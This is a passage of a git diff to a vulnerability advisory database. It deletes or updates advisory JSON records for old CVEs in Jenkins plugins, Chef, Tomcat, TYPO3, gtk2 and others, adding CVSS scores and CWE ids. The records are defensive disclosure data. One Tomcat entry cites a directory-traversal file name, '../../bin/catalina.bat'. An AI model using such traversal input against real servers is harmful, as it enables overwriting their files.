a/advisories/unreviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-f68m-q26r-64f6", - "modified": "2022-05-17T05:26:20Z", - "published": "2022-05-17T05:26:20Z", - "aliases": [ - "CVE-2010-5142" - ], - "details": "chef-server-api/app/controllers/users.rb in the API in Chef before 0.9.0 does not require administrative privileges for the create, destroy, and update methods, which allows remote authenticated users to manage user accounts via requests to the /users URI.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5142" - }, - { - "type": "WEB", - "url": "https://github.com/opscode/chef/commit/c3bb41f727fbe00e5de719d687757b24c8dcdfc8" - }, - { - "type": "WEB", - "url": "http://tickets.opscode.com/browse/CHEF-1289" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-08-08T10:26:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json b/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json index e08ff39032378..796a05a4bfbd6 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json +++ b/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f6r7-g7pj-vhjx", - "modified": "2022-05-01T01:53:02Z", + "modified": "2024-02-02T15:30:26Z", "published": "2022-05-01T01:53:02Z", "aliases": [ "CVE-2005-0891" ], "details": "Double free vulnerability in gtk 2 (gtk2) before 2.2.4 allows remote attackers to cause a denial of service (crash) via a crafted BMP image.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json b/advisories/unreviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json deleted file mode 100644 index 78615a7e3901c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-fcmh-7492-g4q9", - "modified": "2022-05-24T16:58:33Z", - "published": "2022-05-24T16:58:33Z", - "aliases": [ - "CVE-2019-17433" - ], - "details": "z-song laravel-admin 1.7.3 has XSS via the Slug or Name on the Roles screen, because of mishandling on the \"Operation log\" screen.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17433" - }, - { - "type": "WEB", - "url": "https://github.com/z-song/laravel-admin/issues/3847" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-10-10T12:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json b/advisories/unreviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json deleted file mode 100644 index 6c507ce73c9c0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ffj8-w4rj-vr7v", - "modified": "2022-05-13T01:15:08Z", - "published": "2022-05-13T01:15:08Z", - "aliases": [ - "CVE-2019-1003045" - ], - "details": "A vulnerability in Jenkins ECS Publisher Plugin 1.0.0 and earlier allows attackers with Item/Extended Read permission, or local file system access to the Jenkins home directory to obtain the API token configured in this plugin's configuration.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003045" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-03-25/#SECURITY-846" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/03/28/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107628" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-03-28T18:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json b/advisories/unreviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json deleted file mode 100644 index b924fe97dfc31..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ffv8-x822-fx73", - "modified": "2022-05-13T01:25:15Z", - "published": "2022-05-13T01:25:15Z", - "aliases": [ - "CVE-2019-1003096" - ], - "details": "Jenkins TestFairy Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003096" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1062" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json b/advisories/unreviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json deleted file mode 100644 index abc26b2cc4c83..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-fhgg-j92h-29rc", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003091" - ], - "details": "A missing permission check in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003091" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json b/advisories/unreviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json deleted file mode 100644 index f93762da293fa..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g2rp-qwrq-qqqq", - "modified": "2022-05-13T01:17:42Z", - "published": "2022-05-13T01:17:42Z", - "aliases": [ - "CVE-2019-1003094" - ], - "details": "Jenkins Open STF Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003094" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1059" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-311" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json b/advisories/unreviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json deleted file mode 100644 index 7501441432c67..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g3gj-632x-fhrh", - "modified": "2022-05-13T01:31:33Z", - "published": "2022-05-13T01:31:33Z", - "aliases": [ - "CVE-2019-1003028" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins JMS Messaging Plugin 1.1.1 and earlier in SSLCertificateAuthenticationMethod.java, UsernameAuthenticationMethod.java that allows attackers with Overall/Read permission to have Jenkins connect to a JMS endpoint.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003028" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-1033" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107295" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-20T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json b/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json index 98618383428b5..b0cf4098d0194 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json +++ b/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g3ph-crp3-36hm", - "modified": "2022-05-17T05:45:23Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-17T05:45:23Z", "aliases": [ "CVE-2010-4168" ], "details": "Multiple use-after-free vulnerabilities in OpenTTD 1.0.x before 1.0.5 allow (1) remote attackers to cause a denial of service (invalid write and daemon crash) by abruptly disconnecting during transmission of the map from the server, related to network/network_server.cpp; (2) remote attackers to cause a denial of service (invalid read and daemon crash) by abruptly disconnecting, related to network/network_server.cpp; and (3) remote servers to cause a denial of service (invalid read and application crash) by forcing a disconnection during the join process, related to network/network.cpp.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -65,7 +68,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json b/advisories/unreviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json deleted file mode 100644 index 98e1c98cefc08..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g3rg-cj5x-3vpf", - "modified": "2022-05-13T01:31:33Z", - "published": "2022-05-13T01:31:33Z", - "aliases": [ - "CVE-2019-10278" - ], - "details": "A cross-site request forgery vulnerability in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10278" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json b/advisories/unreviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json deleted file mode 100644 index dde84db5f18b5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json +++ /dev/null @@ -1,62 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g7cf-wg27-qw87", - "modified": "2022-05-17T00:50:18Z", - "published": "2022-05-17T00:50:18Z", - "aliases": [ - "CVE-2014-9634" - ], - "details": "Jenkins before 1.586 does not set the secure flag on session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to capture cookies by intercepting their transmission within an HTTP session.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9634" - }, - { - "type": "WEB", - "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185148" - }, - { - "type": "WEB", - "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" - }, - { - "type": "WEB", - "url": "https://jenkins.io/changelog-old/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/72054" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-09-12T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json b/advisories/unreviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json deleted file mode 100644 index 9c1154bbdb66b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g857-p997-wx7w", - "modified": "2022-05-02T03:46:56Z", - "published": "2022-05-02T03:46:56Z", - "aliases": [ - "CVE-2009-3629" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3629" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53918" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json b/advisories/unreviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json deleted file mode 100644 index c8b5e9a7bcd4d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json +++ /dev/null @@ -1,219 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ggx9-4728-588r", - "modified": "2022-05-02T03:37:48Z", - "published": "2022-05-02T03:37:48Z", - "aliases": [ - "CVE-2009-2693" - ], - "details": "Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2693" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55855" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19355" - }, - { - "type": "WEB", - "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7017" - }, - { - "type": "WEB", - "url": "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02241113" - }, - { - "type": "WEB", - "url": "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2010-04/msg00001.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00089.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00090.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2013-01/msg00037.html" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=127420533226623&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=133469267822771&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=136485229118404&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=139344343412337&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38316" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38346" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38541" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38687" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/39317" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40330" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40813" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/43310" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/57126" - }, - { - "type": "WEB", - "url": "http://securitytracker.com/id?1023505" - }, - { - "type": "WEB", - "url": "http://support.apple.com/kb/HT4077" - }, - { - "type": "WEB", - "url": "http://svn.apache.org/viewvc?rev=892815&view=rev" - }, - { - "type": "WEB", - "url": "http://svn.apache.org/viewvc?rev=902650&view=rev" - }, - { - "type": "WEB", - "url": "http://tomcat.apache.org/security-5.html" - }, - { - "type": "WEB", - "url": "http://tomcat.apache.org/security-6.html" - }, - { - "type": "WEB", - "url": "http://ubuntu.com/usn/usn-899-1" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2011/dsa-2207" - }, - { - "type": "WEB", - "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:176" - }, - { - "type": "WEB", - "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:177" - }, - { - "type": "WEB", - "url": "http://www.redhat.com/support/errata/RHSA-2010-0119.html" - }, - { - "type": "WEB", - "url": "http://www.redhat.com/support/errata/RHSA-2010-0580.html" - }, - { - "type": "WEB", - "url": "http://www.redhat.com/support/errata/RHSA-2010-0582.html" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/509148/100/0/threaded" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/37944" - }, - { - "type": "WEB", - "url": "http://www.vmware.com/security/advisories/VMSA-2011-0003.html" - }, - { - "type": "WEB", - "url": "http://www.vmware.com/support/vsphere4/doc/vsp_vc41_u1_rel_notes.html" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/0213" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1559" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1986" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-22" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-01-28T20:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json b/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json index fd0fd76e03849..8cf6dd157c7cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json +++ b/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ghp8-rg92-746w", - "modified": "2022-05-01T01:47:09Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:47:09Z", "aliases": [ "CVE-2005-0102" ], "details": "Integer overflow in camel-lock-helper in Evolution 2.0.2 and earlier allows local users or remote malicious POP3 servers to execute arbitrary code via a length value of -1, which leads to a zero byte memory allocation and a buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -69,7 +72,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json b/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json index be43d08dfe1e9..1e24ab7af6a95 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json +++ b/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ghqg-gfm6-qhh6", - "modified": "2022-05-01T01:56:00Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:56:00Z", "aliases": [ "CVE-2005-1141" ], "details": "Integer overflow in the readpgm function in pnm.c for GOCR 0.40, when using the netpbm library, allows remote attackers to execute arbitrary code via a PNM file with large width and height values, which leads to a heap-based buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json b/advisories/unreviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json deleted file mode 100644 index 6a65d881cea34..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gpmw-h4wq-4rch", - "modified": "2023-10-25T18:31:26Z", - "published": "2022-05-24T16:56:45Z", - "aliases": [ - "CVE-2019-10409" - ], - "details": "A missing permission check in Jenkins Project Inheritance Plugin 2.0.0 and earlier allowed attackers with Overall/Read permission to trigger project generation from templates.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10409" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-401" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json b/advisories/unreviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json deleted file mode 100644 index 5ff80f04a4289..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gvhp-v4m2-3rwf", - "modified": "2022-05-13T01:15:02Z", - "published": "2022-05-13T01:15:02Z", - "aliases": [ - "CVE-2019-10277" - ], - "details": "Jenkins StarTeam Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10277" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1085" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json b/advisories/unreviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json deleted file mode 100644 index b7799c719ad04..0000000000000 --- 